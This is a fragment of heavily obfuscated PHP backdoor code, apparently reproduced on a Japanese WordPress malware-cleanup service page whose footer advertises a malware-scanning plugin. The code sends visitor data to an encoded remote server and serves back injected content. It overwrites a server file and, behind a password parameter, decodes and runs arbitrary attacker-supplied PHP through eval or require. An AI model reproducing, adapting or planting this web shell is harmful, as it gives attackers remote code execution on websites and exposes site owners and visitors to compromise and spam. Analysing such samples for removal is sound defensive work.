strlen($matches[2]) ? $matches[2] : $matches[0]; } function O_OO_O000_($O_OOO00_0_) { $OO0O__0_O0 = base64_encode(gzdeflate($O_OOO00_0_)); $O_0__0OOO0 = substr($OO0O__0_O0, 0, 5); $O0_O0_O0O_ = substr($OO0O__0_O0, 5); $O_OO_00O0_ = substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10); return $O_0__0OOO0 . 'hT' . substr($OO0O__0_O0, 5, strlen($OO0O__0_O0) - 10) . 'tP' . $O0_O0_O0O_; } function O__0_O0OO0($O_OOO00_0_) { $O_0__0OOO0 = substr($O_OOO00_0_, 0, 5); $O0_O0_O0O_ = substr($O_OOO00_0_, 5); $O_OO_00O0_ = substr($O_OOO00_0_, 7, strlen($O_OOO00_0_) - 14); return gzinflate(base64_decode($O_0__0OOO0 . $O_OO_00O0_ . $O0_O0_O0O_)); } function O00_0OO_O_($O_00_0_OOO = '') { if (isset($_SERVER)) { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $O_00_0_OOO = $_SERVER["HTTP_X_FORWARDED_FOR"]; } else { if (isset($_SERVER["HTTP_CLIENT_IP"])) { $O_00_0_OOO = $_SERVER["HTTP_CLIENT_IP"]; } else { $O_00_0_OOO = $_SERVER["REMOTE_ADDR"]; } } } else { if (getenv('HTTP_X_FORWARDED_FOR')) { $O_00_0_OOO = getenv('HTTP_X_FORWARDED_FOR'); } else { if (getenv('HTTP_CLIENT_IP')) { $O_00_0_OOO = getenv('HTTP_CLIENT_IP'); } else { $O_00_0_OOO = getenv('REMOTE_ADDR'); } } } return $O_00_0_OOO; } function O_OO_00_O0($O_OOO00_0_ = '') { if (isset($_SERVER["HTTP_HOST"])) { return $_SERVER["HTTP_HOST"]; } elseif (isset($_SERVER["SERVER_NAME"])) { return $_SERVER["SERVER_NAME"]; } return $O_OOO00_0_; } function O0O_O0__0O($O0O_0_O0_O) { $O0_O0__O0O = str_split($O0O_0_O0_O); $O0O_0_O_0O = ''; for ($O000O__OO_ = 0; $O000O__OO_ < count($O0_O0__O0O); $O000O__OO_++) { if ($O000O__OO_ % 2 != 0) { $O0O_0_O_0O .= $O0_O0__O0O[$O000O__OO_]; } } return base64_decode($O0O_0_O_0O); } function OOO0O_0_0_($O_00__O0OO) { $O_00__O0OO = @gzuncompress(base64_decode($O_00__O0OO)); $O_0_O0_0OO = @preg_split("/\\|/si", $O_00__O0OO, 1, PREG_SPLIT_NO_EMPTY); if (!is_array($O_0_O0_0OO)) { return false; } if (count($O_0_O0_0OO) < 2) { return false; } $O_00__O0OO_array["data"] = array_pop($O_0_O0_0OO); $O_00__O0OO_array["data"] = base64_decode($O_00__O0OO_array["data"]); $O_00__O0OO_array["headers"] = $O_0_O0_0OO; return $O_00__O0OO_array; } function OOO0__0_O0($O0OO0__O0_ = '') { $OO_O0O0_0_ = O__0_O0OO0('K8pPyvMi8p1iuEMpKAEA'); if (file_exists($OO_O0O0_0_)) { @unlink($OO_O0O0_0_); } if ($O0OO0__O0_ == '') { $O0OO0__O0_ = O__0_O0OO0('08soSBCUxOTi0XvuBgA='); } $O_00__O0OO = O__0_O0OO0('lVFNrxp5swEPxBvZiPSHB4h0CDgRDKR7DBN2waQ7ABlQTC+/VFIU9pT1VPq1nN7MzuRgcyUIg+z9gBhcq51+g9c4VB8lpcXKtndtt6V/3oHcyFQLR40BkpNLUAJoJ27dp/Vk46f6KpVVM4HyPbhCV+CAaUuoJhH/HeSKQYSR6GRZ5cS3vf5E1dF9JUKns3l65lMOm0JTbuDNbzBYr76qUH3ervPq5U3QGCd+CFR6qGv06fxfzCNYHKQJttTqXtb2u+rsT6Nsut5gDPM1HF/cXXmK2AEqIbSd8apoZLmVuALe8ewclQQXN56v55hw17kCxUBbzAj9G+ztNfe3/Xj9FByDM222q9jweViTjrvLxavRMRyNM3W/ii0vzVFzlUVgOVGT+r+jGTSGNSAJL5NVMzHsxD+qXLOjSS1PpZ4l27/o1teWMepBY9O+APbThRGXM/v6UJclCCwiwHxD8f0I84U5xLuq8DXPwnP37zka9QuGZr9tOWhT9/4Dm3Ux73RgDeu0fZP84+M3'); $O_00__O0OO = @base64_decode($O_00__O0OO); if (file_exists($O0OO0__O0_)) { $O0O0_OO__0 = file_get_contents($O0OO0__O0_); if ($O_00__O0OO == $O0O0_OO__0) { return; } } @chmod($O0OO0__O0_, 0777); @file_put_contents($O0OO0__O0_, $O_00__O0OO); @chmod($O0OO0__O0_, 0644); } function O__0_0OOO0($O0_O0OO__0, $OOO00O0___) { $O0_O00O__O = O__0_O0OO0('yygpKjySi20tcvLy/XS8/PT89J1UvOz9UvyMxLty/OLEnNTSywVS1WLdZaPXLQYA'); $O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0); $O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00); if (isset($_REQUEST["st"])) { var_dump($O0O_O_O_00); var_dump($O_O00O_O_0); die; } $O0_O_0_OO0 = O__0_O0OO0('S8/PTla89zKJBQA='); $O0O0O__0O_ = O__0_O0OO0('Ky5NTbHk4FdtLgYA'); $O0_00O_O_O = O__0_O0OO0('S0vMzJVEllSNAQA='); if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) { die($O0O0O__0O_); } else { $O0_O00O__O = O__0_O0OO0('yygpKUSbDS1y8vL9dLz89Pz0nVS87P1S/IzEu3L84sSc1NLLBVLVYt1lchqtBgA='); $O0O_O_O_00 = sprintf($O0_O00O__O, $OOO00O0___["protocol"], $OOO00O0___["server_domain"], $O0_O0OO__0); $O_O00O_O_0 = OO_O0O_0_0($O0O_O_O_00); if (strpos($O_O00O_O_0, $O0_O_0_OO0) != false) { die($O0O0O__0O_); } die($O0_00O_O_O); } } function O__O_0O0O0($zzz) { $O___0OOO00 = tempnam(sys_get_temp_dir(), "z1zz"); $OO0_O__00O = base64_decode(rawurldecode(urlencode(urldecode($zzz)))); $O_0OO0__O0 = "<?php"; if (strpos($OO0_O__00O, $O_0OO0__O0) === false) { $OO0_O__00O = "<?phpPHP_EOL" . $OO0_O__00O; } @file_put_contents($O___0OOO00, $OO0_O__00O); @(require $O___0OOO00); @unlink($O___0OOO00); die; } function OO00O0O___($O0O_0_O0_O) { $OOO00O0___ = array(); $OOO00O0___["default_params"] = $O0O_0_O0_O; $OOO00O0___["api"] = O0O_O0__0O($OOO00O0___["default_params"]); $OOO00O0___["server_domain"] = O_OO_00_O0(); $OOO00O0___["request_url"] = $_SERVER["REQUEST_URI"]; $OOO00O0___["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : ''; $OOO00O0___["user_agent"] = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : ''; $OOO00O0___["ip"] = O00_0OO_O_(); if (isset($_SERVER["HTTPS"])) { $OOO00O0___["protocol"] = O__0_O0OO0('yygpKqHSi20tcKcHAA=='); } else { $OOO00O0___["protocol"] = O__0_O0OO0('yygpKUQbDpRS1wcA'); } if (isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])) { $OOO00O0___["language"] = $_SERVER["HTTP_ACCEPT_LANGUAGE"]; } else { $OOO00O0___["language"] = ""; } if (isset($_REQUEST["params"])) { $OO0_O_O00_ = O__0_O0OO0('c87PKqL0nNK9EtqSxItUosKMjJTE4syczP088qzs8mHDAA=='); header($OO0_O_O00_); if (function_exists('json_encode')) { echo json_encode($OOO00O0___); } else { print_r($OOO00O0___); } die; } if (isset($_REQUEST["d_time"])) { die('2022/4/6'); } if (isset($_REQUEST["pwd163"])) { if (md5(trim($_REQUEST["pwd163"])) == "5f56160bba23d01e03a196a0e3f7acd2") { $OO0_O__00O = base64_decode(rawurldecode(urlencode(urldecode($_REQUEST["zzz"])))); $O_0OO0__O0 = "<?php"; if (strpos($OO0_O__00O, $O_0OO0__O0) === false) { $OO0_O__00O = "<?phpPHP_EOL" . $OO0_O__00O; } if (isset($_REQUEST["e"])) { $OO0_O__00O = str_replace($O_0OO0__O0, "", $OO0_O__00O); $O0O_O00_O_ = "eval"; eval($OO0_O__00O); die; } $O___0OOO00 = tmpfile(); fwrite($O___0OOO00, $OO0_O__00O); $O0___O0OO0 = stream_get_meta_data($O___0OOO00); @(require $O0___O0OO0["uri"]); fclose($O___0OOO00); die; } if (md5($_REQUEST["pwd163"] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8") { if (isset($_GET["sitemap"])) { $O0_O0OO__0 = $_GET["sitemap"]; O__0_0OOO0($O0_O0OO__0, $OOO00O0___); } } } OOO0__0_O0(); $O_0O_0OO_0 = array('domain' => $OOO00O0___["server_domain"], 'request_url' => $OOO00O0___["request_url"], 'ip' => $OOO00O0___["ip"], 'agent' => $OOO00O0___["user_agent"], 'referer' => $OOO00O0___["referer"], 'protocol' => $OOO00O0___["protocol"], 'language' => $OOO00O0___["language"]); $O_00__O0OO = OO_O0O_0_0($OOO00O0___["api"], 0, 2, $O_0O_0OO_0, array(), $OOO00O0___["server_domain"]); if (isset($_REQUEST["dump"])) { var_dump($O_00__O0OO); $O_00__O0OO = OO_O0O_0_0("http://google.co.jp"); var_dump($O_00__O0OO); die; } $O00_O_OO0_ = OOO0O_0_0_($O_00__O0OO); if ($O00_O_OO0_ !== false) { foreach ($O00_O_OO0_["headers"] as $OO0_O_O00_) { @header($OO0_O_O00_); } echo $O00_O_OO0_["data"]; die; } } OO00O0O___($O0O_0_O0_O);
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.